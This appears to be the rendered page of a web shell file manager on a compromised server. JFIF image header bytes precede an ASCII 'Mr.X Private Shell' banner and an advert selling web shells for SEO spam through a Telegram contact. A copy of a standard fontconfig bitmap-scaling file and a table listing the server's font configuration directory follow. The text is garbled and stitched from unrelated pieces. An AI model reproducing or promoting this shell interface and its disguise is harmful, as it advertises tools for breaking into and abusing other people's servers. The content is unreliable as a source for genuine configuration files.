����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?xml version="1.0"?>
<!DOCTYPE fontconfig SYSTEM "urn:fontconfig:fonts.dtd">
<fontconfig>
<description>Bitmap scaling</description>
<!--
If font is bitmap, calculate scale factor.
Note that color bitmap fonts have scalable=true, while
non-color ones have scalable=false. Both groups have outline=false.
-->
<match target="font">
<test name="outline" compare="eq">
<bool>false</bool>
</test>
<edit name="pixelsizefixupfactor" mode="assign">
<divide>
<name target="pattern">pixelsize</name>
<name target="font" >pixelsize</name>
</divide>
</edit>
</match>
<!--
For non-scalable bitmap fonts (ie. non-color), skip
minor scaling if hinting is enabled.
-->
<match target="font">
<test name="outline" compare="eq">
<bool>false</bool>
</test>
<test name="scalable" compare="eq">
<bool>false</bool>
</test>
<test name="hinting" compare="eq">
<bool>true</bool>
</test>
<edit name="scalingnotneeded" mode="assign">
<and>
<less>
<name>pixelsizefixupfactor</name>
<double>1.2</double>
</less>
<more>
<name>pixelsizefixupfactor</name>
<double>0.8</double>
</more>
</and>
</edit>
</match>
<match target="font">
<test name="scalingnotneeded" compare="eq">
<bool>true</bool>
</test>
<edit name="pixelsizefixupfactor" mode="assign">
<double>1.0</double>
</edit>
</match>
<!--
If we *are* going to scale, go ahead and do it.
-->
<match target="font">
<test name="outline" compare="eq">
<bool>false</bool>
</test>
<test name="pixelsizefixupfactor" compare="not_eq">
<double>1.0</double>
</test>
<edit name="matrix" mode="assign">
<times>
<name>matrix</name>
<matrix>
<name>pixelsizefixupfactor</name> <double>0</double>
<double>0</double> <name>pixelsizefixupfactor</name>
</matrix>
</times>
</edit>
<edit name="size" mode="assign">
<divide>
<name>size</name>
<name>pixelsizefixupfactor</name>
</divide>
</edit>
</match>
</fontconfig>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 10-hinting-slight.conf | File | 620 B | 0644 |
|
| 10-scale-bitmap-fonts.conf | File | 2.02 KB | 0644 |
|
| 11-lcdfilter-default.conf | File | 695 B | 0644 |
|
| 20-unhint-small-vera.conf | File | 1.34 KB | 0644 |
|
| 25-no-bitmap-fedora.conf | File | 1.13 KB | 0644 |
|
| 25-unhint-nonlatin.conf | File | 3.25 KB | 0644 |
|
| 30-metric-aliases.conf | File | 12.92 KB | 0644 |
|
| 40-nonlatin.conf | File | 7.59 KB | 0644 |
|
| 45-generic.conf | File | 3.41 KB | 0644 |
|
| 45-latin.conf | File | 6.89 KB | 0644 |
|
| 48-spacing.conf | File | 441 B | 0644 |
|
| 49-sansserif.conf | File | 639 B | 0644 |
|
| 50-user.conf | File | 751 B | 0644 |
|
| 51-local.conf | File | 263 B | 0644 |
|
| 60-generic.conf | File | 1.87 KB | 0644 |
|
| 60-latin.conf | File | 1.99 KB | 0644 |
|
| 65-fonts-persian.conf | File | 9.89 KB | 0644 |
|
| 65-nonlatin.conf | File | 9.07 KB | 0644 |
|
| 69-unifont.conf | File | 687 B | 0644 |
|
| 80-delicious.conf | File | 437 B | 0644 |
|
| 90-synthetic.conf | File | 1.72 KB | 0644 |
|
| README | File | 979 B | 0644 |
|